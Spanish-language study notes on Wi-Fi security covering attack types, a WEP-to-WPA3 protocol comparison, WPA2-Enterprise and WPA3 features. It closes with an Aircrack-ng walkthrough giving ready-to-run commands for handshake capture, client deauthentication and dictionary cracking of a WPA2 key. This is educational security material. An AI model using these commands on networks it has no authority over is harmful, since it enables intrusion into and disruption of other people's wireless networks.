Seguridad en Redes Inalámbricas

Riesgos y Vulnerabilidades

Las redes inalámbricas (Wi-Fi) son inherentemente más inseguras que las cableadas porque el medio de transmisión (el aire) es accesible para cualquiera dentro del rango de cobertura.

Sniffing (Escucha): Captura de tráfico en modo promiscuo/monitor. Si no está cifrado (o si se tiene la clave), se puede leer todo.
Rogue AP (Evil Twin): Un atacante crea un punto de acceso falso con el mismo nombre (SSID) y potencia que el legítimo. Las víctimas se conectan a él, permitiendo al atacante interceptar credenciales (Man-in-the-Middle).
Jamming (Interferencias): Emisión de ruido en las frecuencias de 2.4GHz o 5GHz para bloquear la comunicación (DoS).
Ataques de Desautenticación: Enviar paquetes de gestión falsificados para desconectar a un cliente legítimo (necesario para capturar el handshake en WPA2).

Medidas de Seguridad en Protocolos Sin Hilos

Evolución de los Protocolos

Protocolo	Cifrado	Integridad	Estado	Vulnerabilidad Principal
WEP	RC4	CRC-32	Obsoleto	IVs cortos y predecibles. Crackeable en minutos.
WPA	TKIP	Michael	Obsoleto	TKIP es una mejora sobre RC4 pero sigue siendo débil.
WPA2	AES-CCMP	CBC-MAC	Estándar	Robusto, pero vulnerable a fuerza bruta offline (captura de handshake).
WPA3	AES-GCMP	BIP	Recomendado	Protege contra fuerza bruta offline (SAE) y mejora cifrado en redes abiertas (OWE).

WPA2-Enterprise (802.1X)

En entornos corporativos, usar una contraseña única para todos (WPA2-PSK) es un riesgo enorme.

Servidor RADIUS: Centraliza la autenticación.
EAP (Extensible Authentication Protocol): Protocolo marco para autenticación.
- PEAP: Crea un túnel TLS cifrado antes de enviar credenciales (usuario/pass).
- EAP-TLS: Usa certificados digitales tanto en el servidor como en el cliente. Es el método más seguro existente (incluso si roban la contraseña, no pueden entrar sin el certificado).

WPA3: Mejoras Clave

SAE (Simultaneous Authentication of Equals): Reemplaza al handshake de 4 vías de WPA2. Evita que un atacante capture un paquete y trate de adivinar la contraseña offline. Si falla un intento, debe interactuar de nuevo con el router.
OWE (Opportunistic Wireless Encryption): Cifra el tráfico en redes abiertas (cafeterías, aeropuertos) sin necesidad de contraseña, evitando el sniffing pasivo.

Auditoría Wi-Fi: Suite Aircrack-ng

Es el conjunto de herramientas más famoso para auditar redes inalámbricas.

Ejemplo de flujo de auditoría WPA2-PSK (Educativo):

Modo Monitor: Poner la tarjeta en modo escucha para capturar todo el tráfico del aire, no solo el dirigido a nosotros.
```
airmon-ng start wlan0
```
Reconocimiento (Airodump-ng): Ver redes disponibles, canales, cifrado y clientes conectados.
```
airodump-ng wlan0mon
```
Captura de Handshake: Fijamos el objetivo (BSSID y Canal). Necesitamos capturar el momento en que un cliente se conecta para obtener el "4-way handshake" que contiene la validación de la contraseña.
```
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
```
Ataque de Desautenticación (Aireplay-ng): Si no hay nadie conectándose, forzamos a un cliente legítimo a desconectarse para que se reconecte automáticamente y capturemos el handshake.
```
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
```
Cracking (Aircrack-ng): Intentar adivinar la clave contenida en el handshake capturado usando un diccionario.
```
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
```

Defensa: Para protegerse de esto en WPA2, se debe usar una contraseña larga y compleja (no presente en diccionarios) o migrar a WPA3.

Riesgos y Vulnerabilidades​

Medidas de Seguridad en Protocolos Sin Hilos​

Evolución de los Protocolos​

WPA2-Enterprise (802.1X)​

WPA3: Mejoras Clave​

Auditoría Wi-Fi: Suite Aircrack-ng​